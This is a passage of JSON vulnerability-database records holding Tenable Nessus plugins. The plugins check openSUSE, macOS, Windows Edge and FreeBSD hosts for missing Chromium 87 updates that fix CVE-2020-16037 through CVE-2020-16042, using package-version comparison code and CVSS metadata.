false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-2216.NASL", "href": "https://www.tenable.com/plugins/nessus/144020", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2216.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144020);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/21\");\n\n script_cve_id(\"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\");\n script_xref(name:\"IAVA\", value:\"2020-A-0571-S\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-2216)\");\n script_summary(english:\"Check for the openSUSE-2020-2216 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nUpdate to 87.0.4280.88 boo#1179576\n\n - CVE-2020-16037: Use after free in clipboard\n\n - CVE-2020-16038: Use after free in media\n\n - CVE-2020-16039: Use after free in extensions\n\n - CVE-2020-16040: Insufficient data validation in V8\n\n - CVE-2020-16041: Out of bounds read in networking\n\n - CVE-2020-16042: Uninitialized Use in V8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1179576\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-87.0.4280.88-lp151.2.162.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-87.0.4280.88-lp151.2.162.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-87.0.4280.88-lp151.2.162.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-87.0.4280.88-lp151.2.162.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:54:26", "description": "This update for chromium fixes the following issues :\n\nUpdate to 87.0.4280.88 (boo#1179576)\n\n - CVE-2020-16037: Use after free in clipboard\n\n - CVE-2020-16038: Use after free in media\n\n - CVE-2020-16039: Use after free in extensions\n\n - CVE-2020-16040: Insufficient data validation in V8\n\n - CVE-2020-16041: Out of bounds read in networking\n\n - CVE-2020-16042: Uninitialized Use in V8", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-2181)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-2181.NASL", "href": "https://www.tenable.com/plugins/nessus/143545", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2181.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143545);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/21\");\n\n script_cve_id(\"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\");\n script_xref(name:\"IAVA\", value:\"2020-A-0571-S\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-2181)\");\n script_summary(english:\"Check for the openSUSE-2020-2181 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nUpdate to 87.0.4280.88 (boo#1179576)\n\n - CVE-2020-16037: Use after free in clipboard\n\n - CVE-2020-16038: Use after free in media\n\n - CVE-2020-16039: Use after free in extensions\n\n - CVE-2020-16040: Insufficient data validation in V8\n\n - CVE-2020-16041: Out of bounds read in networking\n\n - CVE-2020-16042: Uninitialized Use in V8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1179576\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-87.0.4280.88-lp152.2.57.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-87.0.4280.88-lp152.2.57.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-87.0.4280.88-lp152.2.57.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-87.0.4280.88-lp152.2.57.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:54:50", "description": "The version of Google Chrome installed on the remote macOS host is prior to 87.0.4280.88. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_12_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-03T00:00:00", "type": "nessus", "title": "Google Chrome < 87.0.4280.88 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-20T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_87_0_4280_88.NASL", "href": "https://www.tenable.com/plugins/nessus/143470", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143470);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/20\");\n\n script_cve_id(\n \"CVE-2020-16037\",\n \"CVE-2020-16038\",\n \"CVE-2020-16039\",\n \"CVE-2020-16040\",\n \"CVE-2020-16041\",\n \"CVE-2020-16042\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0571-S\");\n\n script_name(english:\"Google Chrome < 87.0.4280.88 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 87.0.4280.88. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2020_12_stable-channel-update-for-desktop advisory. Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4b9934e1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1142331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1138683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1149177\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1150649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1151865\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1151890\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 87.0.4280.88 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16039\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'87.0.4280.88', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:55:15", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 87.0.664.57. It is, therefore, affected by multiple vulnerabilities as referenced in the ADV200002-12-7-2020 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 87.0.664.57 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-20T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_87_0_664_57.NASL", "href": "https://www.tenable.com/plugins/nessus/143588", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143588);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/20\");\n\n script_cve_id(\n \"CVE-2020-16037\",\n \"CVE-2020-16038\",\n \"CVE-2020-16039\",\n \"CVE-2020-16040\",\n \"CVE-2020-16041\",\n \"CVE-2020-16042\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0571-S\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 87.0.664.57 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 87.0.664.57. It is, therefore, affected\nby multiple vulnerabilities as referenced in the ADV200002-12-7-2020 advisory. Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?083510ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 87.0.664.57 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16039\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '87.0.664.57' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:55:16", "description": "Chrome Releases reports :\n\nThis release contains 8 security fixes, including :\n\n- [1142331] High CVE-2020-16037: Use after free in clipboard. Reported by Ryoya Tsukasaki on 2020-10-26\n\n- [1138683] High CVE-2020-16038: Use after free in media. Reported by Khalil Zhani on 2020-10-14\n\n- [1149177] High CVE-2020-16039: Use after free in extensions.\nReported by Anonymous on 2020-11-15\n\n- [1150649] High CVE-2020-16040: Insufficient data validation in V8.\nReported by Lucas Pinheiro, Microsoft Browser Vulnerability Research on 2020-11-19\n\n- [1151865] Medium CVE-2020-16041: Out of bounds read in networking.\nReported by Sergei Glazunov and Mark Brand of Google Project Zero on 2020-11-23\n\n- [1151890] Medium CVE-2020-16042: Uninitialized Use in V8. Reported by Andre Bargull on 2020-11-2", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-07T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (01ffd06a-36ed-11eb-b655-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-21T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_01FFD06A36ED11EBB6553065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/143517", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143517);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/21\");\n\n script_cve_id(\"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\");\n script_xref(name:\"IAVA\", value:\"2020-A-0571-S\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (01ffd06a-36ed-11eb-b655-3065ec8fd3ec)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Chrome Releases reports :\n\nThis release contains 8 security fixes, including 